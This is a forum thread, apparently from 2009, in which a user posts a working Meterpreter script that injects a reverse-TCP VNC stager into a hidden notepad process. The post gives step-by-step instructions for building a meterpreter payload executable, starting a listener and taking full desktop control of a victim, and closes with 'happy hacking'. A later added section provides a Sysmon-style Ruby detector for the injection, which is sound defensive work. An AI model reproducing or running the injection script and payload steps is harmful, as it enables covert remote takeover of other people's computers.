Remote Exploit Forums

#1  12-18-2009, 02:57 AM
vnc memory injection with meterpreter

Description:
A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

I spent quite a bit of time trying to get vnc_oneport.rb working. Then I finally decided that vnc.rb worked great except for one thing: it created a file on the victim's machine and you would have to manually delete it later. So I utilized the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

First we need to traverse to the directory that we will be putting our script into.

Open a shell and type:
Code:
cd /pentest/exploits/framework3/scripts/meterpreter/
Use whatever editor you're most comfortable with here, but keep the name the same.
Code:
nano vnc_mem.rb
Now copy this:
Code:
# $Id: vnc_mem.rb 12-17-2009 hdm $

#
# Meterpreter script for obtaining a quick VNC session
# Hybrid of vnc.rb and vnc_oneport.rb
# Utilizes memory functions so no file is created
# Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
# You can exit out of courtesy shell easily once you obtain a vnc session
# All code written by H.D. Moore (hdm)
# Edited by hhmatt
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
        "-h"  => [ false,  "This help menu"],
        "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
        "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
#       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
        "-e"  => [ true,    "The process to run and inject into (default: notepad.exe)"]
)

#
# Default parameters
#

runme    = "notepad.exe"
rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
#autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
                print_line(opts.usage)
                return
        when "-r"
                rhost = val
        when "-p"
                rport = val.to_i
#       when "-D"
#               autoconn = false
        when "-e"
                runme = val
        end
end

#
# Generate the VNC stager (kept in memory only; nothing is written to disk)
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate
print_status("VNC stager is #{raw.length} bytes long")


#
# Create a host process
#
pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => true}).pid
print_status("Host process #{runme} has PID #{pid}")
note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
mem  = note.memory.allocate(1024*32)

print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)


#
# Setup the multi/handler that will receive the VNC connect back
#
mul = client.framework.exploits.create("multi/handler")
mul.datastore['PAYLOAD']       = "windows/vncinject/reverse_tcp"
mul.datastore['LHOST']         = rhost
mul.datastore['LPORT']         = rport
mul.datastore['EXITFUNC']      = 'process'
mul.datastore['ExitOnSession'] = true

mul.exploit_simple(
        'Payload'  => mul.datastore['PAYLOAD'],
        'RunAsJob' => true)

#
# Execute the agent: a new thread in the host process starts at the
# injected stager, which connects back to the multi/handler above
#
print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)

print_status("VNC agent started with endpoint #{rhost}:#{rport}...")
And paste it into your editor.

Then you can save and exit:
Code:
Ctrl+o (the letter not the number zero)

Ctrl+x
Nothing more needs to be done; it will automatically load the script once Metasploit starts.
So let's start Metasploit!
Code:
/pentest/exploits/framework3/./msfconsole
I'm using the reverse TCP Metasploit connection from an executable payload. You can use whatever method you know or have to give you a meterpreter session.

Ok so let's get our meterpreter session started.
Code:
msf > use multi/handler

msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf(handler) > show options
At this point you will need to set LHOST and LPORT (remember to change these to match your network and port).
LHOST is your attacker machine and LPORT is your port to listen on.
Code:
msf(handler) > set LHOST 192.168.1.100

msf(handler) > set LPORT 81
OK. Let's start our listener now.
Code:
msf(handler) > exploit
At this point you should see something like this:
Code:
[*] Starting the payload handler...
[*] Started Reverse Handler on port 81
Now we need to run our executable on the victim machine to give us a meterpreter session.
This is how I made my exe.
Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=81 X > /tmp/meter.exe
This is what you should get at the end:
Code:
meterpreter >
This is a good point to make sure you're connected to the right machine.
Code:
meterpreter > ipconfig
meterpreter > getuid
If you need to know some of the main basic commands that meterpreter uses, just type in a ? like this.
Code:
meterpreter > ?
OK, now to see if our script is recognized.
Code:
meterpreter > run vnc_mem.rb -h
This should post the script's help options.
Here's what I get:
Code:
OPTIONS:

    -e <opt>  The process to run and inject into (default: notepad.exe)
    -h        This help menu
    -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
    -r <opt>  The IP of the system running Metasploit listening for the connect back
Looks good, let's give it a run:
Code:
meterpreter > run vnc_mem.rb
Success!
At this point you should've received a new window open in TightVNC with your victim's desktop and full control!
You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

Hope you get some useful information from this and happy hacking!
__________________
The only real problems in life are the problems that are common to all humans.

Last edited by hhmatt81; 01-16-2010 at 12:49 AM.
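An added example (not part of hhmatt81's post or of Metasploit) showing what the script above looks like from the defender's side. Every step it performs on the target maps to a host event: a hidden host process is created, a handle with create-thread and memory-write rights is opened to it, a thread is started at an address that no loaded module backs, and the host process then makes an outbound connection to the handler port. The Ruby below runs a small rule set over constructed records whose field names follow Sysmon event IDs 1, 10, 8 and 3 (ProcessCreate, ProcessAccess, CreateRemoteThread, NetworkConnect); the sample values, the rule names and the list of binaries that should never open network connections are assumptions made for this example.

```ruby
# Added example (not from the original post or Metasploit): a detector for
# the host-side trace the vnc_mem.rb script leaves on the target. Events
# below are constructed to resemble Sysmon records; they are not captured.
require 'set'

# Windows process access rights the injection needs (Win32 API values).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION  = 0x0008
PROCESS_VM_WRITE      = 0x0020
INJECTION_RIGHTS      = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Assumed list of binaries that have no business initiating network connections.
NO_NETWORK_EXPECTED = Set['notepad.exe', 'calc.exe', 'mspaint.exe'].freeze

# Constructed sample events modelled on Sysmon IDs 1 (ProcessCreate),
# 10 (ProcessAccess), 8 (CreateRemoteThread) and 3 (NetworkConnect).
SAMPLE_EVENTS = [
  { id: 1,  image: 'C:\Windows\System32\notepad.exe', parent_image: 'C:\Users\victim\meter.exe', pid: 1234 },
  { id: 10, source_image: 'C:\Users\victim\meter.exe', target_image: 'C:\Windows\System32\notepad.exe',
            target_pid: 1234, granted_access: 0x1FFFFF },
  { id: 8,  source_image: 'C:\Users\victim\meter.exe', target_image: 'C:\Windows\System32\notepad.exe',
            target_pid: 1234, start_address: '0x00A20000', start_module: '' },
  { id: 3,  image: 'C:\Windows\System32\notepad.exe', pid: 1234,
            dest_ip: '192.168.1.100', dest_port: 4545, initiated: true },
  # Benign noise: a user-launched notepad and a browser talking HTTPS.
  { id: 1,  image: 'C:\Windows\System32\notepad.exe', parent_image: 'C:\Windows\explorer.exe', pid: 2222 },
  { id: 3,  image: 'C:\Program Files\Mozilla Firefox\firefox.exe', pid: 3333,
            dest_ip: '93.184.216.34', dest_port: 443, initiated: true },
].freeze

# Last path component, lower-cased, so image paths compare by binary name.
def basename(path)
  path.to_s.split('\\').last.to_s.downcase
end

# Walks the events in order and returns an array of alert hashes.
def detect_injection(events)
  injected = {}   # target pid => image of the process that injected into it
  alerts   = []
  events.each do |ev|
    case ev[:id]
    when 10
      # A handle to a different process carrying create-thread plus memory-write rights.
      cross = basename(ev[:source_image]) != basename(ev[:target_image])
      if cross && (ev[:granted_access] & INJECTION_RIGHTS) == INJECTION_RIGHTS
        alerts << { rule: 'process_access_injection_rights', pid: ev[:target_pid],
                    source: ev[:source_image], target: ev[:target_image] }
      end
    when 8
      # Remote thread whose start address is backed by no loaded module:
      # code placed in freshly allocated memory, which is what allocate+write produces.
      if ev[:start_module].to_s.empty?
        injected[ev[:target_pid]] = ev[:source_image]
        alerts << { rule: 'remote_thread_unbacked', pid: ev[:target_pid],
                    source: ev[:source_image], target: ev[:target_image] }
      end
    when 3
      next unless ev[:initiated]
      dest = "#{ev[:dest_ip]}:#{ev[:dest_port]}"
      if injected.key?(ev[:pid])
        # The process that just received a remote thread is now calling out.
        alerts << { rule: 'injected_process_network', pid: ev[:pid], dest: dest }
      elsif NO_NETWORK_EXPECTED.include?(basename(ev[:image]))
        alerts << { rule: 'unexpected_network', pid: ev[:pid], dest: dest }
      end
    end
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_injection(SAMPLE_EVENTS).each { |a| puts a.inspect }
end
```

The unbacked start address is the strongest single signal: a thread started by another process at an address outside every loaded module is how allocate-and-write injection shows up, whichever host binary was chosen with -e. The follow-on network rule ties that same process to the connect back on the handler port, so the three alerts together describe the script's whole run on the target.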
#2  12-18-2009, 04:52 AM
cRaZylilmuffin

Cool, I'll have to try it out.
__________________
"Things are not what they appear to be: nor are they otherwise." -Surangama Sutra
#3  12-18-2009, 12:57 PM

Great work, dude! Nice merge between the .rb's.
#4  12-18-2009, 04:16 PM

Thanks, I'm glad you liked it.
__________________
The only real problems in life are the problems that are common to all humans.